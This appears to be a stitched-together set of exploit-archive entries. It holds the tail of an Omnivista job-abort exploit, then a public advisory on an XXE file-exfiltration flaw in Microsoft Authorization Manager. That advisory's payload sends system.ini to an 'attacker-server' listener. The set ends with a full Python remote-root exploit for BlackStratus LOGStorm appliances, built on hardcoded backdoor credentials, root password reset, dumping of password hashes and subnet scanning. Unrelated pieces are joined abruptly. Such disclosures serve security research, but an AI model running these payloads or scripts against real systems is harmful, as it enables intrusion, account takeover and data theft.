print "Exploit sequence completed, command should have been executed...:-)"
p.close()
# optional requests to remove the job after the exploitation
### in metasploit, we should migrate to another process and then call an "abort" function of Omnivista
##phase5 - abort the job
canceljob = "47494f500100000000000030000000000000008e0100000000000010" + objectkey + "0000000743616e63656c000000000000"
###phase6 - delete the jobset
deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000"
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-AZMAN-XXE-FILE-EXFILTRATION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.microsoft.com
Product:
==============================
Microsoft Authorization Manager
v6.1.7601
The Authorization Manager allows you to set role-based permissions for
Authorization Manager-enabled applications.
You can store authorization stores in either XML files, Active Directory
Domain Services (AD DS), Active Directory Lightweight Directory
Services (AD LDS), or in Microsoft SQL Server databases.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
"msxml3.dll" DLL is used by "Microsoft Management Console" azman.msc /
eventvwr.msc and other Windows components to process XML files.
The parser processes XML External Entity nodes allowing external
connections to be made to remote malicious DTD documents that can
potentially
allow access to files on users system to be exfiltrated to a remote server.
Therefore the XML parser is vulnerable to XXE attack if a user
unknowingly opens a malicious XML 'authorization store' document via remote
share/USB into 'Authorization Manager'.
"C:\Windows\system32\mmc.exe"
"C:\Windows\system32\azman.msc"
"C:\Windows\System32\msxml3.dll"
Exploit code(s):
===============
Start our listener on attacker server to access users files.
python -m SimpleHTTPServer 8080
Create the evil XML file with following payload to steal "system.ini" as
data theft POC.
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Next, create the "payload.dtd" DTD document to host on attacker server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-server:8080?%file;'>">
%all;
1) Go to Windows CL and type azman to bring up Authorization Manager
2) Go to Action / "Open Authorization store..."
3) Select authorization store type to be 'XML file'
4) Browse to open the "PWN.XML" authorization store file and click Ok
User will see error message "Cannot open the authorization store. The
following problem occurred: An attempt was made
to load a program with an incorrect format."
Result: files delivered to your server!
Disclosure Timeline:
===========================================
Vendor Notification: August 30, 2016
Vendor Reply: August 30, 2016
does not meet the bar for servicing as someone would have to
obtain the XML from an untrusted source or compromised source"
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
#!/usr/bin/python
# logstorm-root.py
#
# BlackStratus LOGStorm Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# -Synopsis-
#
# "Better Security and Compliance for Any Size Business"
#
# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among
# other things, to assume complete control over the virtual appliance with root privileges. This is
# possible due to multiple network servers listening for network connections by default, allowing
# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.
#
# -Tested-
#
# v4.5.1.35
# v4.5.1.96
#
# -Usage-
#
# Dependencies: pip install paramiko MySQL-python
#
# There are (5) actions provided in this script: root, reset, sql, web and scan.
#
# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command
# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password
# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials
# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account
# [scan] scans a given <host>/24 for potentially vulnerable appliances
#
# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.
#
# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.
#
# -Fixes-
#
# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But
# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall
# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another
# product altogether because this appliance, as of today, simply adds too much attack surface to the network.
#
# -Bonuses-
#
# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks
#
# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files
# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running
# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)
#
# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd
#
import sys
import socket
import time
from paramiko import ssh_exception
import paramiko
import MySQLdb
import httplib
import urllib
SSH_BANNER = "_/_/_/_/"
SSH_PORT = 22
MYSQL_PORT = 3306
MYSQL_DB = "htr"
MYSQL_CMD = "select USER_ID,hex(MD5_PASSWORD) from users;"
WEB_URL = "/tvs/layout/j_security_check"
ROOT_CREDS = ["root", "3!acK5tratu5"]
HTINIT_CREDS = ["htinit", "htinit"]
MYSQL_CREDS = ["htr", "htr_pwd"]
WEB_CREDS = ["webserviceuser", "donotChangeOnInstall"]
def main():
if(len(sys.argv) < 2):
print("Usage: %s <action> <host>" % sys.argv[0])
print("Eg. %s root 10.1.1.3\n" % sys.argv[0])
print("Actions: root reset sql web scan")
return
action = str(sys.argv[1])
host = str(sys.argv[2])
if("scan" not in action):
try:
socket.inet_aton(host)
except socket.error:
print("[-] %s doesn't look like a valid ip address" % host)
return
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#
# ssh login as root and execute 'id'
#
if(action == "root"):
try:
ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)
except ssh_exception.AuthenticationException:
print("\n[-] Action failed, could not login with root credentials\n")
return
print("[+] Success!")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("id")
print(ssh_stdout.readline())
return
#
# ssh login as htinit and reset root password to the default
#
elif(action == "reset"):
print("[~] Resetting password on %s..." % host)
try:
ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)
except ssh_exception.AuthenticationException:
print("\n[-] Reset failed, could not login with htinit credentials\n")
return
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("")
ssh_stdin.write("4" + "\n")
time.sleep(2)
ssh_stdin.write(ROOT_CREDS[1] + "\n")
time.sleep(2)
ssh_stdin.write("^C" + "\n")
time.sleep(1)
print("[+] Appliance root password should now be reset")
return
#
# sql login as htr and select user/hash columns from the web users table
#
elif(action == "sql"):
print("[~] Asking %s for it's web users and their password hashes..." % host)
try:
db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)
except MySQLdb.Error as error:
print("\n[-] Failed to connect to %s:\n%s\n" % (host, error))
return
cursor = db.cursor()
cursor.execute(MYSQL_CMD)
data = cursor.fetchall()
print("[+] Got creds!\n")
for row in data:
print("USER_ID: %s\nMD5_PASSWORD: %s\n" % (row[0], row[1]))
db.close()
return
#
# http login as webserviceuser and gain presumably admin privileges
#
elif(action == "web"):
print("[~] Attempting to login as backdoor web user at %s..." % host)
try:
client = httplib.HTTPSConnection(host)
except:
print("[-] Couldn't establish SSL connection to %s" % host)
return
params = urllib.urlencode({"j_username" : WEB_CREDS[0], "j_password" : WEB_CREDS[1]})
headers = {"Host" : host, "Content-Type" : "application/x-www-form-urlencoded", "Content-Length" : "57"}
client.request("POST", WEB_URL, params, headers)
response = client.getresponse()
if(response.status == 408):
print("[+] Success!")
else:
print("[-] Service returned %d %s, which is actually not our criteria for success" % (response.status, response.reason))
return
#
# check the ssh network banner to identify appliances within range of <host>/24
#
elif(action == "scan"):
count = 0
print("[~] Scanning %s for LOGStorm appliances..." % sys.argv[2])
for x in range(1,255):
banner = None
#
# 10.1.1.1/24 -> 10.1.1.[x]
#
host = str(sys.argv[2]).split('/')[0][:-1] + str(x)
try:
ssh.connect(host, SSH_PORT, "user-that-doesnt-exist", "pass-that-doesnt-work", timeout=2)
except ssh_exception.NoValidConnectionsError:
pass
except socket.timeout:
pass
except ssh_exception.AuthenticationException as error:
banner = ssh._transport.get_banner()
if banner and SSH_BANNER in banner:
print("[!] %s\n" % host)
count+=1
print("[+] Found %d appliance(s)"% count)
return
if __name__ == "__main__":
main()